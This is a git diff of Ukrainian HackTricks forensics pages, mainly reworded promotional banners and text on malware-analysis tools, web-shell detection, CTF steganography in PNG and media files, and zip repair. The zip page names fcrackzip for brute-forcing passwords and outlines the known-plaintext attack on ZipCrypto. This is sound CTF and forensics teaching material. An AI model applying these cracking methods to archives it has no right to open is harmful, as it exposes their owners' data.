Крім того, дані про загрози також походять від користувацьких внесків за допомогою функції перевірки LMD та ресурсів спільноти щодо шкідливих програм. ### rkhunter @@ -122,7 +123,7 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ### PEstudio -[PEstudio](https://www.winitor.com/download) - це інструмент, який дозволяє отримувати інформацію про виконувані файли Windows, такі як імпорт, експорт, заголовки, а також перевіряє VirusTotal та знаходить потенційні техніки Att\&ck. +[PEstudio](https://www.winitor.com/download) - це інструмент, який дозволяє отримувати інформацію про виконувані файли Windows, таку як імпорт, експорт, заголовки, а також перевіряє VirusTotal та знаходить потенційні техніки Att\&ck. ### Detect It Easy(DiE) @@ -138,7 +139,7 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk ### Apple Binary Signatures -При перевірці деякого **зразка шкідливого ПЗ** ви завжди повинні **перевіряти підпис** бінарного файлу, оскільки **розробник**, який підписав його, може вже бути **пов'язаний** з **шкідливим ПЗ**. +При перевірці деякого **зразка шкідливого ПЗ** ви завжди повинні **перевіряти підпис** бінарного файлу, оскільки **розробник**, який його підписав, може вже бути **пов'язаний** з **шкідливим ПЗ**. ```bash #Get signer codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier" @@ -153,12 +154,27 @@ spctl --assess --verbose /Applications/Safari.app ### Стекінг файлів -Якщо ви знаєте, що деяка папка, що містить **файли** веб-сервера, **була останнім разом оновлена на певну дату**. **Перевірте** дату створення та зміни всіх **файлів** на **веб-сервері**, і якщо яка-небудь дата є **підозрілою**, перевірте цей файл. +Якщо ви знаєте, що деяка тека, що містить **файли** веб-сервера, була **останнім разом оновлена на певну дату**. **Перевірте** дату створення та зміни всіх **файлів** на **веб-сервері**, і якщо яка-небудь дата є **підозрілою**, перевірте цей файл. ### Базові значення -Якщо файли папки **не повинні були бути змінені**, ви можете обчислити **хеш** **оригінальних файлів** папки та **порівняти** їх з **поточними**. Будь-що змінене буде **підозрілим**. +Якщо файли теки **не повинні були змінені**, ви можете обчислити **хеш** **оригінальних файлів** теки та **порівняти** їх з **поточними**. Будь-яка зміна буде **підозрілою**. ### Статистичний аналіз Коли інформація зберігається в журналах, ви можете **перевірити статистику, таку як кількість разів, коли кожен файл веб-сервера був доступний, оскільки веб-оболонка може бути одним з найбільш**. + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index f438460e3..7da6c5326 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДТРИМКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} Тут ви знайдете цікаві трюки для конкретних типів файлів та/або програмного забезпечення: @@ -37,16 +38,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДТРИМКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index 0e15b49b4..3a1535b54 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -Деякі речі, які можуть бути корисними для відлагодження/деобфускації зловмисного файлу VBS: +Деякі речі, які можуть бути корисними для відлагодження/деобфускації шкідливого файлу VBS: ## echo ```bash @@ -52,16 +53,17 @@ End With End Function ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 8f0a288dc..bb2ae123d 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,20 @@ -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. - -
- -**Файли PNG** високо цінуються в **викликах CTF** за їх **безвтратне стиснення**, що робить їх ідеальними для вбудовування прихованих даних. Інструменти, такі як **Wireshark**, дозволяють аналізувати файли PNG шляхом розкладання їх даних у мережевих пакетах, розкриваючи вбудовану інформацію або аномалії. - -Для перевірки цілісності файлів PNG та виправлення пошкоджень використовується інструмент **pngcheck**, який надає функціонал командного рядка для перевірки та діагностики файлів PNG ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Коли файли виходять за межі простих виправлень, онлайн-сервіси, такі як [PixRecovery від OfficeRecovery](https://online.officerecovery.com/pixrecovery/), надають веб-рішення для **відновлення пошкоджених PNG**, допомагаючи відновити важливі дані для учасників CTF. - -Ці стратегії підкреслюють важливість комплексного підходу в CTF, використовуючи комбінацію аналітичних інструментів та технік відновлення для виявлення та відновлення прихованих або втрачених даних. +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} + +**PNG файли** високо цінуються в **завданнях CTF** за їх **безвтратну компресію**, що робить їх ідеальними для вбудовування прихованих даних. Інструменти, такі як **Wireshark**, дозволяють аналізувати PNG файли, розкладаючи їх дані в мережевих пакетах, розкриваючи вбудовану інформацію або аномалії. + +Для перевірки цілісності PNG файлів та відновлення пошкоджень, **pngcheck** є важливим інструментом, який пропонує функціонал командного рядка для перевірки та діагностики PNG файлів ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Коли файли виходять за межі простих виправлень, онлайн-сервіси, такі як [PixRecovery від OfficeRecovery](https://online.officerecovery.com/pixrecovery/), надають веб-рішення для **відновлення пошкоджених PNG**, допомагаючи відновити важливі дані для учасників CTF. + +Ці стратегії підкреслюють важливість комплексного підходу в завданнях CTF, використовуючи комбінацію аналітичних інструментів та технік відновлення для виявлення та відновлення прихованих або втрачених даних. diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index b9ae07cdb..e936ad362 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,28 +1,41 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} -**Маніпулювання аудіо та відео файлами** є стандартом у завданнях з **форензики CTF**, використовуючи **стеганографію** та аналіз метаданих для приховання або розкриття секретних повідомлень. Інструменти, такі як **[mediainfo](https://mediaarea.net/en/MediaInfo)** та **`exiftool`**, є необхідними для перевірки метаданих файлу та ідентифікації типів вмісту. +**Маніпулювання аудіо та відео файлами** є основою викликів **CTF forensics**, використовуючи **стеганографію** та аналіз метаданих для приховання або розкриття секретних повідомлень. Інструменти, такі як **[mediainfo](https://mediaarea.net/en/MediaInfo)** та **`exiftool`**, є необхідними для інспекції метаданих файлів та ідентифікації типів контенту. -Для завдань з аудіо **[Audacity](http://www.audacityteam.org/)** виділяється як провідний інструмент для перегляду хвиль та аналізу спектрограм, що є важливим для виявлення тексту, закодованого в аудіо. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** високо рекомендується для детального аналізу спектрограм. **Audacity** дозволяє маніпулювати аудіо, такі як уповільнення або реверс треків для виявлення схованих повідомлень. **[Sox](http://sox.sourceforge.net/)**, утиліта командного рядка, відмінно підходить для конвертації та редагування аудіо файлів. +Для викликів, пов'язаних з аудіо, **[Audacity](http://www.audacityteam.org/)** виділяється як провідний інструмент для перегляду хвиль та аналізу спектрограм, які є важливими для виявлення тексту, закодованого в аудіо. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** високо рекомендується для детального аналізу спектрограм. **Audacity** дозволяє маніпулювати аудіо, такі як уповільнення або реверс треків для виявлення схованих повідомлень. **[Sox](http://sox.sourceforge.net/)**, утиліта командного рядка, відмінно підходить для конвертації та редагування аудіо файлів. -Маніпулювання **найменш значущими бітами (LSB)** є поширеною технікою в аудіо та відео стеганографії, використовуючи фіксовані частини файлів медіа для приховування даних непомітно. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** корисний для декодування повідомлень, прихованих у вигляді **DTMF сигналів** або **коду Морзе**. +Маніпулювання **найменш значущими бітами (LSB)** є поширеною технікою в аудіо та відео стеганографії, використовуючи фіксовані частини файлів медіа для приховання даних непомітно. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** корисний для декодування повідомлень, прихованих у вигляді **DTMF сигналів** або **коду Морзе**. -Завдання з відео часто включають контейнерні формати, які об'єднують аудіо та відео потоки. **[FFmpeg](http://ffmpeg.org/)** є основним інструментом для аналізу та маніпулювання цими форматами, здатним демультиплексувати та відтворювати вміст. Для розробників, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** інтегрує можливості FFmpeg у Python для продвинутих сценаріїв взаємодії. +Відео виклики часто включають контейнерні формати, які об'єднують аудіо та відео потоки. **[FFmpeg](http://ffmpeg.org/)** є основним інструментом для аналізу та маніпулювання цими форматами, здатним демультиплексувати та відтворювати вміст. Для розробників, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** інтегрує можливості FFmpeg в Python для продвинутих сценаріїв взаємодії. -Цей набір інструментів підкреслює необхідну універсальність у завданнях CTF, де учасники повинні використовувати широкий спектр аналізу та маніпуляційних технік для виявлення схованих даних у аудіо та відео файлах. +Цей набір інструментів підкреслює необхідну універсальність в CTF викликах, де учасники повинні використовувати широкий спектр аналізу та маніпуляційних технік для виявлення схованих даних у аудіо та відео файлах. -## References +## Посилання * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index f5670cb17..038317361 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,30 +1,46 @@ # Підступи до ZIP-файлів +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} -**Командні інструменти** для управління **zip-файлами** є важливими для діагностики, відновлення та взлому zip-файлів. Ось деякі ключові утиліти: +**Інструменти командного рядка** для управління **zip-файлами** є важливими для діагностики, відновлення та взлому zip-файлів. Ось деякі ключові утиліти: -- **`unzip`**: Розкриває причину, чому zip-файл може не розпакуватися. +- **`unzip`**: Розкриває причину того, чому zip-файл може не розпакуватися. - **`zipdetails -v`**: Надає детальний аналіз полів формату zip-файлу. -- **`zipinfo`**: Показує вміст zip-файлу без їх видобутку. +- **`zipinfo`**: Виводить список вмісту zip-файлу без їх видобутку. - **`zip -F input.zip --out output.zip`** та **`zip -FF input.zip --out output.zip`**: Спробуйте відновити пошкоджені zip-файли. -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Інструмент для грубої сили підбору паролів для zip, ефективний для паролів до близько 7 символів. +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Інструмент для брут-форс взлому паролів zip, ефективний для паролів до близько 7 символів. -Специфікація [формату zip-файлу](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) надає вичерпні відомості про структуру та стандарти zip-файлів. +Специфікація формату zip-файлу надає вичерпні відомості про структуру та стандарти zip-файлів. -Важливо зауважити, що захищені паролем zip-файли **не шифрують імена файлів або розміри файлів** всередині, уразливість, яку не поділяють файли RAR або 7z, які шифрують цю інформацію. Крім того, zip-файли, зашифровані за допомогою старішого методу ZipCrypto, вразливі до **атаки на текст**, якщо доступний незашифрований примірник стиснутого файлу. Ця атака використовує відомий вміст для взлому пароля zip, уразливість, детально описана в [статті HackThis](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) та подальше пояснення в [цій науковій статті](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Однак zip-файли, захищені шифруванням **AES-256**, є невразливими до цієї атаки на текст, демонструючи важливість вибору безпечних методів шифрування для конфіденційних даних. +Важливо зауважити, що захищені паролем zip-файли **не шифрують імена файлів або розміри файлів** всередині, уразливість, яку не поділяють файли RAR або 7z, які шифрують цю інформацію. Крім того, zip-файли, зашифровані за допомогою старішого методу ZipCrypto, вразливі до **атаки на текст** у разі наявності незашифрованої копії стиснутого файлу. Ця атака використовує відомий вміст для взлому пароля zip, уразливість детально описана в [статті HackThis](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) та подальше пояснення в [цій науковій статті](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Однак zip-файли, захищені шифруванням **AES-256**, є невразливими до цієї атаки на текст, демонструючи важливість вибору безпечних методів шифрування для конфіденційних даних. ## Посилання -* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) +* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. + +
